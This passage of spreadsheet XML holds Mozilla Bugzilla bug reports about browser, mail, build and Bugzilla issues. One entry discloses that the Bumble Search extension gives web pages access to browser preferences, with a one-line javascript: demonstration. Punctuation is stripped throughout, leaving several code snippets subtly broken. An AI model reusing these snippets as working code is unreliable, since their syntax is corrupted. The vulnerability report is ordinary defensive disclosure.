895            (params.search (/\s*isnick\s*|\s*isnick\s*$/) != -1)
Changing to: 
894        rv.isnick = (params.search (/isnick|isnick$/) != -1)
The same should be done for the regular expressions on lines 904 913 916. 
Reproducible: Didn't try</t>
  </si>
  <si>
    <t>CORE-52120</t>
  </si>
  <si>
    <t>window.onerror fires but with the wrong arguments [4xp]</t>
  </si>
  <si>
    <t>window.onerror in NN4 is a error handler with three arguments
  error message
  file url
  line number
but with M17 the handler fires but passes only one strange KeyEvent object as an
argument.
Though Mozilla with JavaScript 1.5 has try/catch exception handling in the core
language and therefore much less need for window.onerror it should be kept
working as in NN4 (or left out totally).</t>
  </si>
  <si>
    <t>SEAMONKEY-242578</t>
  </si>
  <si>
    <t>Composer hangs when you OK the Insert Table dialog using the keyboard</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 .NET CLR 1.1.4322)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a) Gecko/20040504
See summary
Reproducible: Always
Steps to Reproduce:
1. Ctrl+4 to start Composer
2. Bring up the Insert Table dialog
3. Type OK
Actual Results:  
At this point the table has been inserted but the dialog is still up.  You 
can close the dialog but Composer is hung.
I also noticed that the same hang occurs when I use the Close box.</t>
  </si>
  <si>
    <t>steve.swanson</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-387680</t>
  </si>
  <si>
    <t>Talkback on trunk is not getting the correct build ID</t>
  </si>
  <si>
    <t>In the CmTrunk build logs for Camino on maya and cb-xserve01 I'm seeing:
cat: ../config/build_number: No such file or directory
during the Talkback build and symbol delivery.  The build ID in master.ini is set to -server on the maya builds (which are not using the prebuilt Talkback archive) and the symbols are not uploaded.  The build ID is set correctly on the cb-xserve01 builds (using the prebuilt Talkback archive) but the symbols are not uploaded for those either.
This bug also seems to affect any other trunk build that uses Tinderbox.  I checked Thunderbird on Mac and Linux and those build logs are filled with the same message.
config/build_number no longer exists on the trunk since bug 383167.  Tinderbox' post-mozilla.rel.pl was updated in that bug to be able to pick up the build ID.  However Talkback was never updated and is still looks for config/build_number.  The Talkback Makefile has this line:
FC_BUILD        = $(shell cat $(DEPTH)/config/build_number)
Either the Talkback Makefile should be updated to know where to get the build ID (and new prebuilt packages generated for everyone using them) or (perhaps easier) Tinderbox should be updated to pass the build ID in to Talkback whenever calling any of its Makefiles.  This looks like it would be a matter of adding FC_BUILD overrides on the make command line to:
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/tools/tinderbox/post-mozilla-rel.pl&amp;rev=1.124&amp;mark=206229232#204</t>
  </si>
  <si>
    <t>BUGZILLA-322412</t>
  </si>
  <si>
    <t>Typo in error message</t>
  </si>
  <si>
    <t xml:space="preserve"> Error: Can't connect to MySQL server on '10.251.0.100' (113)
   Is your database installed and up and running?
   Do you havethe correct username and password selected in localconfig?
There's a space missing between have and the. See the LXR url.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-281609</t>
  </si>
  <si>
    <t>DOM Inspector broken</t>
  </si>
  <si>
    <t>only View Browser is working the panes above are empty.</t>
  </si>
  <si>
    <t>hhschwab</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-344357</t>
  </si>
  <si>
    <t>Show a proper error when there is no install.rdf</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
After uploading a signed XPI the browser shows me the URL https://addons.mozilla.org/developers/additem.php?function=additem2 as a blank page. There isn't any error message or further information.
Reproducible: Always
Steps to Reproduce:
1. Go to https://addons.mozilla.org/developers/additem.php?type=E
2. Upload the signed XPI that can be found on http://hosting.helpcaster.com/audio/hc_audioFW.xpi
3. Then you see a blank page under https://addons.mozilla.org/developers/additem.php?function=additem2
Actual Results:  
Blank page without further links or any error message.
Expected Results:  
Error message or links/forms to continue with any action.</t>
  </si>
  <si>
    <t>anfuerer</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-482718</t>
  </si>
  <si>
    <t>Remove toolkit history remnants in libxul build left by bug 383833</t>
  </si>
  <si>
    <t>Bug 383833 removed toolkit/components/history from the build but missed removing the libxul library inclusions in toolkit/library.
This means if your app builds with mork you're not going to be able to build with --enable-libxul.</t>
  </si>
  <si>
    <t>BUGZILLA-233295</t>
  </si>
  <si>
    <t>Document terminology customization feature</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: 
variables.none.tmpl introduced a list of terms that could be tweaked to 
produce a branded instance of BZ.  This needs to be added to 
docs\xml\customization.xml and ?
Reproducible: Always
Steps to Reproduce:
1. n/a
2.
3.</t>
  </si>
  <si>
    <t>jwilmoth</t>
  </si>
  <si>
    <t>CORE-361109</t>
  </si>
  <si>
    <t>Crash [@ nsBlockBandData::Init] with position:fixed on select</t>
  </si>
  <si>
    <t>This is a regression from bug 354600 it doesn't happen in 2006-11-16 trunk build but it does with a 2006-11-17 trunk build.
Talkback ID: TB26160871Q
nsBlockBandData::Init  [mozilla\layout\generic\nsblockbanddata.cpp line 72]
nsBlockFrame::Reflow  [mozilla\layout\generic\nsblockframe.cpp line 803]</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-416049</t>
  </si>
  <si>
    <t>Minotaur</t>
  </si>
  <si>
    <t>Minotaur - Needs better human readable output</t>
  </si>
  <si>
    <t>Created attachment 301800
Current output diff of test-output.xml files on a finnish build
The current tool does not output decently readable files and sometimes the error messages can be misleading.  For example if the tool discovers that the Build Under Test did not produce ANY bookmarks output it reports that bookmark lists are not the same length which doesn't necessarily raise the same red flags as build xxx does not have any default bookmarks.  
This bug is to address this and clean it up.  
In short the plan is to:
1. Provide a better diff output when comparing the test-output.xml files 
2. Provide more meaningful messages when encountering empty files (bookmarks output.xml's etc)
3. Provide the same type of diff output when comparing the bookmarks files so that a person can easily analyze the results file without having to bend their mind around two different output schemes.
4. The diff output must of course handle UTF-8 encodings properly
I will attach an example of a current output log.</t>
  </si>
  <si>
    <t>CORE-260685</t>
  </si>
  <si>
    <t>document.all breaks flash on sbcyahoo dsl homepages</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10
SBC/yahoo dsl customers have access to a homepage customizable with different
modules. The module called Today is a Flash module of current events. This
element worked fine with  Mozilla/5.0 (Windows U Windows NT 5.1 en-US
rv:1.7) Gecko/20040803 Firefox/0.9.3. It does not work in the default
installation of  Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3)
Gecko/20040913 Firefox/0.10 with a fresh profile instead the flash module is
overlayed with an upgrade flash message although I have verified I have the
identical Flash plugin in both versions. With help from Pike I disabled
document.all in the 0.10 version and the flash module worked again.
Reproducible: Always
Steps to Reproduce:
1.go to http://dsl.sbc.yahoo.com/   (*see note at bottom)
2.make sure the Today module is included in the page
3.see message to upgrade to Flash 6 or above
4.disable document.all with the following steps:
      a. Enter about:config in the location bar.
      b. Right-click New-&gt;Boolean.
      c. Set the name to browser.dom.document.all.disabled and the value to    true.
      d. Restart the browser.
5. Go back to http://dsl.sbc.yahoo.com/
6. See Flash module working 
{*NOTE: You must be a SBCyahoo DSL customer to access this page however I
created a subaccount for testing purposes if needed I will PM or email login
and password info if requested. This is a subaccount of my own that I was able
to create as a benefit of premium service the account is separate from my own
and will be deleted after any testing or if not needed however I do not want to
post the info here for obvious reasons}
Actual Results:  
fixed flash module on http://dsl.sbc.yahoo.com/ by disabling document.all
Expected Results:  
Shown Flash module
Although document.all actually causes the page to be read as written by Yahoo
(they do not support the Mozilla Browser)when read this way it implements an
If no ActiveX enabled/ then show update Flash Message which was ignored before
document.all support so appearing to be a regression. There are numerous posts
in  the forums about this even though it seems a trivial issue. Other flash
sites on yahoo still work. This thread is a more detailed description of the
problem and solution: http://forums.mozillazine.org/viewtopic.php?t=131149  as
stated in the thread an option for conditional disableing of document.all would
be appreciated.</t>
  </si>
  <si>
    <t>mymozbugs</t>
  </si>
  <si>
    <t>SEAMONKEY-108911</t>
  </si>
  <si>
    <t>thousands of nsDependentString assertions (#ifdef TARGET_CARBON)</t>
  </si>
  <si>
    <t>when i startup todays debug build i get literally thousands of
###!!! ASSERTION: nsDependentString must wrap only null-terminated strings:
'!*aEndPtr' file nsDependentString.h line 86
i can't use the debug build or work with it this is a blocker.</t>
  </si>
  <si>
    <t>CORE-207330</t>
  </si>
  <si>
    <t>nsHTMLDocument::TryChannelCharset should use do_GetService (like everyone else) to get @mozilla.org/intl/charsetalias1</t>
  </si>
  <si>
    <t>WARNING: You are calling CreateInstance {98d41c21-ccf3-11d2-b3b1-00805f8a6670}
when a service for this CID already exists! file
i:/build/mozilla/xpcom/components/nsComponentManager.cpp line 1962
nsComponentManagerImpl::CreateInstance(nsComponentManagerImpl * const
0x0043dc10 const nsID &amp; {...} nsISupports * 0x00000000 const nsID &amp; {...}
void * * 0x0012b8f4) line 1962 + 24 bytes
nsCreateInstanceByCID::operator()(const nsID &amp; {...} void * * 0x0012b8f4) line
55 + 45 bytes
nsCOMPtr::assign_from_helper(const nsCOMPtr_helper &amp; {...}
const nsID &amp; {...}) line 988 + 18 bytes
nsCOMPtr::nsCOMPtr(const nsCOMPtr_helper &amp;
{...}) line 561
nsHTMLDocument::TryChannelCharset(nsIChannel * 0x0ba5f218 int &amp; 0 nsAString &amp;
{...}) line 664
{98d41c21-ccf3-11d2-b3b1-00805f8a6670}@mozilla.org/intl/charsetalias1Charset
Alias Informationrel:uconv.dll</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-506595</t>
  </si>
  <si>
    <t>[Intranet] Teach the intranet to recognize users from their ssl certificates</t>
  </si>
  <si>
    <t>There is a mediawiki extension AutomaticREMOTE_USER that does this already tweak it for our setup should be minimal.</t>
  </si>
  <si>
    <t>BUGZILLA-152935</t>
  </si>
  <si>
    <t>Pref for no notification on Target Milestone change not respected.</t>
  </si>
  <si>
    <t>I am running Bugzilla 2.14.2 and some of my users have turned off email
notification for Priority status severity and milestone changes.  However
notifications are still being sent when the milestone changes.
I posted this problem to n.p.m.webtools and Gerv replied with information on
where to put debugging warnings.  Based on this I was able to fix the problem.
 It seems that while userprefs.cgi says Status controls Priority status
severity and milestone changes getEmailAttributes($@) in processmail only
returns Status if Severity Status or Priority changes.
I will attach a very small patch for your consideration.</t>
  </si>
  <si>
    <t>jodym</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-208667</t>
  </si>
  <si>
    <t>Hebrew</t>
  </si>
  <si>
    <t>103.fm: site has no content - document.all</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030529
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030529
The site is Flash-based but even if Flash is installed Mozilla still doesn't
display it.
Reproducible: Always
Steps to Reproduce:
1. Make sure Flash is installed
2. Open the above URL
Actual Results:  
A blue blank page appears.
Expected Results:  
A Flash-based website should display. Compare with IE6.</t>
  </si>
  <si>
    <t>bugzillamozilla</t>
  </si>
  <si>
    <t>CORE-111432</t>
  </si>
  <si>
    <t>Print Preview</t>
  </si>
  <si>
    <t>[FIRST] Mouse wheel scrolling doesn't work in print preview on page margin or on frame page</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.6+)
Gecko/20011120
BuildID:    2001112003
In print preview mode mouse wheel is beaing almost ignored
only scrolling a few lines after some scrolling with scroll-bar.
Reproducible: Always
Steps to Reproduce:
1. Open any page
2. Select Print Preview option in File menu
3. Move mouse wheel up and down
Actual Results:  Page scrolls a few lines sometime and stops.  
Scrolling with scroll bar sometimes helps to scroll with a wheel for
anothwr few lines.
Expected Results:  Page scroll smoothly up and down as in ordinary case.</t>
  </si>
  <si>
    <t>mik</t>
  </si>
  <si>
    <t>BUGZILLA-253360</t>
  </si>
  <si>
    <t>IF() should be replaced by CASE WHEN</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.1) Gecko/20040721 Debian/1.7.1-2
Build Identifier: 
As IF(cond exp1 exp2) function is MySQL specific we should replace it with
CASE WHEN cond THEN exp1 ELSE exp2 END which is supported by all major
databases (see bug 182136).
The patch will follow
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>Tomas.Kopal</t>
  </si>
  <si>
    <t>SEAMONKEY-55358</t>
  </si>
  <si>
    <t>Order of Sidebar tabs not correct in first browser window</t>
  </si>
  <si>
    <t>I've got my My Sidebar tabs arranged with What's Related first Search 
second etc.... This order shows up in the list in the Customize Sidebar dialog 
box and in the Tabs drop-down menu but it is *not* honored in My Sidebar. See 
the gif which I will attach.</t>
  </si>
  <si>
    <t>shliang</t>
  </si>
  <si>
    <t>verah</t>
  </si>
  <si>
    <t>CORE-979721</t>
  </si>
  <si>
    <t>JavaScript Engine: JIT</t>
  </si>
  <si>
    <t>Leaking BaselineBailout::buffer_</t>
  </si>
  <si>
    <t>Andrew ran Firefox with Leak Sanitizer enabled.  The JS reftests run shows the following output:
Indirect leak of 7168 byte(s) in 7 object(s) allocated from:
#0 0x446434 in calloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:90
#1 0x7fc62cbca9dd in js_calloc /builds/slave/try-l64-asan-00000000000000000/build/obj-firefox/js/src/../../dist/include/js/Utility.h:140
#2 0x7fc62cbca9dd in init /builds/slave/try-l64-asan-00000000000000000/build/js/src/jit/BaselineBailouts.cpp:105
#3 0x7fc62cbca9dd in js::jit::BailoutIonToBaseline(JSContext* js::jit::JitActivation* js::jit::IonBailoutIterator&amp; bool js::jit::BaselineBailoutInfo** js::jit::ExceptionBailoutInfo const*) /builds/slave/try-l64-asan-00000000000000000/build/js/src/jit/BaselineBailouts.cpp:1286
#4 0x7fc62cbd2fa4 in js::jit::ExceptionHandlerBailout(JSContext* js::jit::InlineFrameIteratorMaybeGC const&amp; js::jit::ExceptionBailoutInfo const&amp; js::jit::BaselineBailoutInfo**) /builds/slave/try-l64-asan-00000000000000000/build/js/src/jit/Bailouts.cpp:169
#5 0x7fc62ce6dc74 in HandleExceptionIon /builds/slave/try-l64-asan-00000000000000000/build/js/src/jit/IonFrames.cpp:419
#6 0x7fc62ce6dc74 in js::jit::HandleException(js::jit::ResumeFromException*) /builds/slave/try-l64-asan-00000000000000000/build/js/src/jit/IonFrames.cpp:600
#7 0x7fc632053fff (+0x22fff)
At least one path where that can happen is when we take the early return at hg.mozilla.org/mozilla-central/annotate/e5b09585215f/js/src/jit/BaselineBailouts.cpp#l1379.  There are probably other paths too.</t>
  </si>
  <si>
    <t>jdemooij</t>
  </si>
  <si>
    <t>khuey</t>
  </si>
  <si>
    <t>BUGZILLA-289742</t>
  </si>
  <si>
    <t>No value for param user_verify_class (try running checksetup.pl again) at Bugzilla/Config.pm line 162.</t>
  </si>
  <si>
    <t>A CVS checkout as of about 10 minutes ago (2245 GMT on 9th April) will not run
through checksetup.pl. It keeps giving the errorr:
Precompiling templates ...
No value for param user_verify_class (try running checksetup.pl again) at
Bugzilla/Config.pm line 162.
BEGIN failed--compilation aborted at Bugzilla/Auth.pm line 45.
Compilation failed in require at Bugzilla/User.pm line 44.
BEGIN failed--compilation aborted at Bugzilla/User.pm line 44.
Compilation failed in require at Bugzilla/Template.pm line 35.
BEGIN failed--compilation aborted at Bugzilla/Template.pm line 35.
Compilation failed in require at ./checksetup.pl line 1194.
This is occuring on landfill:
Steps:
1) cvs checkout -d bz-test Bugzilla
2) cd bz-test
3) ./checksetup.pl
4) vi localconfig and set it up.
5) ./checksetup.pl
Expected result: 
DB to be created
Actuall Result:
The above error message and checksetup dying.</t>
  </si>
  <si>
    <t>glob</t>
  </si>
  <si>
    <t>CORE-488911</t>
  </si>
  <si>
    <t>StretchDIBits takes too long - switch between optimizations at run time</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #484864 +++
We will have more than one code path for painting on windows right now the code path is chosen at build time with preprocessor macros. It would be better to choose the path at run time based on prefs.</t>
  </si>
  <si>
    <t>CORE-203406</t>
  </si>
  <si>
    <t>Performace enhancement in CTL code</t>
  </si>
  <si>
    <t>Current CTL code was developed as hack to support Thai and is quite inefficient
in logic. It appears that there are more users of the code than i initially
suspected. Hence cleaning logic reducing code-size and memory consumption.</t>
  </si>
  <si>
    <t>prabhat.hegde</t>
  </si>
  <si>
    <t>TOOLKIT-274625</t>
  </si>
  <si>
    <t>Random crashes when using fayt/find FF10 FFTrunk [@ nsTypeAheadFind::Find]</t>
  </si>
  <si>
    <t>For a couple of days trunk builds have been crashing frequently while using FAYT
or Find. In most cases both FAYT and classic Find stop working right before the
segfault. Fresh profile didn't help.
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a6) Gecko/20041214
Firefox/1.0+
Talkback: TB2545754E TB2545647W</t>
  </si>
  <si>
    <t>mikeclackler</t>
  </si>
  <si>
    <t>markus.langstrom</t>
  </si>
  <si>
    <t>CALENDAR-392448</t>
  </si>
  <si>
    <t>Dialogs</t>
  </si>
  <si>
    <t>Event/Task dialog: edited values in date/time combo boxes not always saved on save and close (does not prompt to save changes when dialogue is closed)</t>
  </si>
  <si>
    <t>Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.6) Gecko/20070728 Thunderbird/2.0.0.6 ID:2007072816
Lightning 0.7pre (build 2007081503)
Editing time or date inside the text field (w./o. using the drop down calendar picker) of the new Event Dialog values are not saved when leaving the dialog via the Save and Close button.
Steps to reproduce (STR):
=========================
1. open any event or create a new one by context menu or double click inside say the week view
2. position mouse cursor inside the Start: date or time text field
3. edit any value per keyboard - do not use the drop down calendar picker
4. close dialog via mouse click on Save and Close button
Actual result:
==============
Nothing has changed edited values have not been saved
Expected result:
================
edited values inside the dialog should be saved upon Save and Close
Problematic code snippet:
http://lxr.mozilla.org/mozilla1.8/source/calendar/resources/content/datetimepickers/datetimepickers.xml#278
http://lxr.mozilla.org/mozilla1.8/source/calendar/resources/content/datetimepickers/datetimepickers.xml#470</t>
  </si>
  <si>
    <t>bv1578</t>
  </si>
  <si>
    <t>ulf.stroehler</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-399693</t>
  </si>
  <si>
    <t>Upgrade bonsai(\-(www|l10n))?.mozilla.org</t>
  </si>
  <si>
    <t>Both tinderbox.mozilla.org and bonsai.mozilla.org are running old checkouts from CVS (bonsai is currently older than tinderbox). It would be nice to get them updated to HEAD.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-499730</t>
  </si>
  <si>
    <t>Fix handling of beta/intl in update-check</t>
  </si>
  <si>
    <t>The current script treats all Intl versions as betas it's harmless since our betas are all non-intl but it could bite us later. I need to tighten the regex and then do a bunch of testing.</t>
  </si>
  <si>
    <t>BUGZILLA-302451</t>
  </si>
  <si>
    <t>Update Release Info pages for 2.20rc2</t>
  </si>
  <si>
    <t>So we'll need a new 2.22 option on the main page and we'll need to update
the planned release dates on the 2.20 page and anything else that might need
updating.</t>
  </si>
  <si>
    <t>BUGZILLA-166481</t>
  </si>
  <si>
    <t>Spellcheck is borked.</t>
  </si>
  <si>
    <t>Spellcheck needs updates.
Firstly I wanted to add new words:
paramater (parameter) (I saw this in a patch somewhere)
existance (existence) (common)
existant (existent)
When I tested this I discovered that spellcheck wasn't finding these
misspellings.  As it happens only the first misspelling in the list is
successfully located.  This seems to be because the file isn't being reopened
between the misspellings.
Furthermore spellcheck should check every file in the CVS tree for
misspellings including the documentation not just Perl scripts.  You can
exclude data and graphs but everything else is fair game really.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-586256</t>
  </si>
  <si>
    <t>[ast] localize community page on mozilla.com/ast/firefox/community</t>
  </si>
  <si>
    <t>Tracks translation of the community page for a 3.6.x release (working with marquinos on IRC directly for that task)</t>
  </si>
  <si>
    <t>FIREFOX-334722</t>
  </si>
  <si>
    <t>Ineffective allocation check in nsNavBookmarks::GetBookmarkFolders (nsNavBookmarks.cpp)</t>
  </si>
  <si>
    <t>This was found through a coverity scan of the mozilla source. |nsNavBookmarks::GetBookmarkFolders| in nsNavBookmarks.cpp contains the following code:
2034     *aFolders = NS_STATIC_CAST(PRInt64*
2035                 nsMemory::Alloc(sizeof(PRInt64) * folders.Length()))
2036     if (! aFolders)
2037       return NS_ERROR_OUT_OF_MEMORY
Surely line 2036 should be testing |*aFolders| not |aFolders|.</t>
  </si>
  <si>
    <t>rflint</t>
  </si>
  <si>
    <t>MOZILLA.ORG-541518</t>
  </si>
  <si>
    <t>Grant tobbi@mozilla-uk.org SVN r/w access to /addons/trunk/site/app/tests/selenium</t>
  </si>
  <si>
    <t>I'll be working together with TMZ on creating Selenium testcases for AMO. (c.f. Bug 541514). Therefore I'd need SVN read/write access to that directory. 
My SVN email is tobbi@mozilla-uk.org and ssh key is bound to LDAP. 
SVN access request for tobbi@mozilla-uk.org is at Bug 534250</t>
  </si>
  <si>
    <t>tobbi.bugs</t>
  </si>
  <si>
    <t>WEBSITES-480122</t>
  </si>
  <si>
    <t>LpSolit's feeds ignored</t>
  </si>
  <si>
    <t>I wrote an article yesterday http://lpsolit.wordpress.com/2009/02/24/do-not-use-mysql-5131-or-newer-with-bugzilla-32-322/ but this one is ignored by planet.m.o despite it's listed in the feed when you click my Bugzilla feed in the right column of the page.
Is it related to bug 477056 comment 5? Wolf said on IRC that my feeds were added back: http://viewvc.svn.mozilla.org/vc/projects/planet/branches/planet/config.ini?r1=22049&amp;r2=22073 but maybe something is still wrong?</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-362146</t>
  </si>
  <si>
    <t>Bumble Search gives web sites read/write access to preferences</t>
  </si>
  <si>
    <t>Bumble Search injects an object called BsOverlayGlobals into all web pages. This object has a property BsOptions which implements the methods getOption() and setOption() - direct access to browser's preferences. To test install BumbleSearch and enter this into the address bar on any web page:
javascript:alert(document.BsOverlayGlobals.BsOptions.getOption(char browser.startup.homepage false))
It should display the value of your homepage setting.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-411572</t>
  </si>
  <si>
    <t>Attachments</t>
  </si>
  <si>
    <t>Unnamed attachments reveal full local paths when forwarded inline or edited as new</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.9b3pre) Gecko/2008010802 SeaMonkey/2.0a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.9b3pre) Gecko/2008010802 SeaMonkey/2.0a1pre
Initially observed by Rimas Kudelis bug 190298 comment #19.
When an attachment has no name forwarding inline or editing as new results in the URI used as the attachment name. Following the discussion in bug 176016 comment #7 exposing relevant information on the profile or user/host-related name and file structures in an e-mail should be avoided.
The file: URI may potentially expose the user name and local file structure by providing the full path to the temporary file. Thus the fix for bug 176016 should be extended to also include this URI type.
Reproducible: Always
Steps to Reproduce:
Forward inline or edit as new a message with unnamed attachment:
&gt; Content-Type: image/png
&gt; Content-Transfer-Encoding: base64
&gt; Content-Disposition: inline
Actual Results:  
Full path to temporary file here exposing user name in Windows XP:
&gt; Content-Type: image/png
&gt;  name=file:///C:/DOCUME~1/(user)/LOCALS~1/TEMP/nsmail.png
&gt; Content-Transfer-Encoding: base64
&gt; Content-Disposition: inline
&gt;  filename=file:///C:/DOCUME~1/(user)/LOCALS~1/TEMP/nsmail.png
Expected Results:  
Neutral attachment name similar to mailbox:
&gt; Content-Type: image/png
&gt;  name=Attached Message Part
&gt; Content-Transfer-Encoding: base64
&gt; Content-Disposition: inline
&gt;  filename=Attached Message Part</t>
  </si>
  <si>
    <t>rsx11m.pub</t>
  </si>
  <si>
    <t>CORE-479109</t>
  </si>
  <si>
    <t>TM: Improve blacklist</t>
  </si>
  <si>
    <t>CORE-509184</t>
  </si>
  <si>
    <t>FF 3.5.2 native JSON.stringify replacer applied only to array items not object properties</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
It appears that the replacer function passed as the second arg to JSON.stringify only allows value replacement to array items.  The only exception I've found is returning undefined from the replacer will remove object properties.
Reproducible: Always
Steps to Reproduce:
JSON.stringify({x:1arr:[1]} function (kv) {
    return typeof v === 'number' ? 3 : value
})
Actual Results:  
'{x:1arr:[3]}'
Expected Results:  
'{x:3arr:[X:3]}'</t>
  </si>
  <si>
    <t>lsmith</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-429429</t>
  </si>
  <si>
    <t>Push SUMO to r12363.</t>
  </si>
  <si>
    <t>This includes the patch that fixes the include loop (https://bugzilla.mozilla.org/show_bug.cgi?id=428978) and a slow query patch (see https://bugzilla.mozilla.org/show_bug.cgi?id=425135 and SQL changes needed in production at http://wiki.mozilla.org/Support/Database_Changes).
We can load test this first to make Justin happy.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-394048</t>
  </si>
  <si>
    <t>Update shared German trunk L10n August 2007 Edition</t>
  </si>
  <si>
    <t>Created attachment 278616
Sync network/ and toolkit/
Wieder mal ist es so weit und es gibt einiges was an der deutschen Ãœbersetzung nicht maher ganz mit dem Englischen Trunk zusammenstimmt.
Die Ã„nderungen in netwerk/ und toolkit/ werden mit dem Patch hier wieder up-to-date gebracht :)</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-454362</t>
  </si>
  <si>
    <t>Admin/Editor Tools</t>
  </si>
  <si>
    <t>Online source differ fails to catch one line files</t>
  </si>
  <si>
    <t>Created attachment 337610
makes chunck size optional
While working on another bug it seems that if a new file is created but only contains one line then the online differ fails to show the line as changed.
This is because a unified output will be :
@@ -00 +1 @@
+ohai
which fails on the current regex :
^@@ ([\+\-])([0-9]+)([0-9]+) [\+\-]([0-9]+)([0-9]+) @@$
Turns out it is because we are expecting +11 but the chunk size can be omitted and defaults to 1. I attached a fix. FYI one line files are fairly rare. Though they happen if the js file is minified.</t>
  </si>
  <si>
    <t>u278084</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-481320</t>
  </si>
  <si>
    <t>Weave on Fennec needs different default clientName from Weave on Firefox.</t>
  </si>
  <si>
    <t>What it says.  extensions.weave.client.name and extensions.weave.client.type should default to Fennec and Mobile or something like that on Fennec but stay as they are on Firefox.</t>
  </si>
  <si>
    <t>CORE-323457</t>
  </si>
  <si>
    <t>replace IsBlockLevel with IsBlockInside and IsBlockOutside</t>
  </si>
  <si>
    <t>We should replace nsStyleDisplay::IsBlockLevel with IsBlockInside and IsBlockOutside.  This was discussed in bug 309322 comment 13 and is within a patch attached to bug 142585.</t>
  </si>
  <si>
    <t>FIREFOX-517708</t>
  </si>
  <si>
    <t>use gBrowser instead of getBrowser() in session restore code</t>
  </si>
  <si>
    <t>Created attachment 401649
patch
getBrowser() is deprecated and exists only for extension compatibility.</t>
  </si>
  <si>
    <t>CORE-309852</t>
  </si>
  <si>
    <t>E4X - JS_ASSERT @ js_Interpret line 5070</t>
  </si>
  <si>
    <t>This assert began appearing recently in debug builds in
e4x/Regress/regress-301596.js. Related to bug 309850 ?
+	fp-&gt;sp	0x0041d9ec
+	sp	0x0041d9f0
NTDLL! 7c901230()
js_Interpret(JSContext * 0x000371b8 unsigned char * 0x00424a84 long *
0x0013ee24) line 5070 + 36 bytes
js_Execute(JSContext * 0x000371b8 JSObject * 0x000387c8 JSScript * 0x004249f8
JSStackFrame * 0x00000000 unsigned int 0x00000000 long * 0x0013fecc) line 1393
+ 19 bytes
JS_ExecuteScript(JSContext * 0x000371b8 JSObject * 0x000387c8 JSScript *
0x004249f8 long * 0x0013fecc) line 3842 + 25 bytes
Process(JSContext * 0x000371b8 JSObject * 0x000387c8 char * 0x00032d56) line
223 + 22 bytes
ProcessArgs(JSContext * 0x000371b8 JSObject * 0x000387c8 char * * 0x00032cc4
int 0x00000006) line 426 + 23 bytes
main(int 0x00000006 char * * 0x00032cc4 char * * 0x00033188) line 2552 + 21 bytes
JS! mainCRTStartup + 227 bytes
KERNEL32! 7c816d4f()</t>
  </si>
  <si>
    <t>CORE-164457</t>
  </si>
  <si>
    <t>Margin-left on a nested table makes it overflow the parent table</t>
  </si>
  <si>
    <t xml:space="preserve">User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1b) Gecko/20020721
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1b) Gecko/20020721
Text does not display when an a nested inner table uses cascading style sheets.
The inner table must be using an id and width attribute. A td element ithin the
nested table must be using an id attribute. I have supplied the exact code that
is breaking in the additional information section. My current build is 2002072104.
Reproducible: Always
Steps to Reproduce:
1.Load Page
2.
3.
Actual Results:  
Nothing is displayed.
Expected Results:  
The word DISPLAY to be present.
#centerTextHeader {
	text-align : right
}
#centerBody {
	margin-left : 40%
}
					DISPLAY
</t>
  </si>
  <si>
    <t>TOOLKIT-414449</t>
  </si>
  <si>
    <t>Minefield couldn't retrieve add-ons button uses Cancel instead of OK</t>
  </si>
  <si>
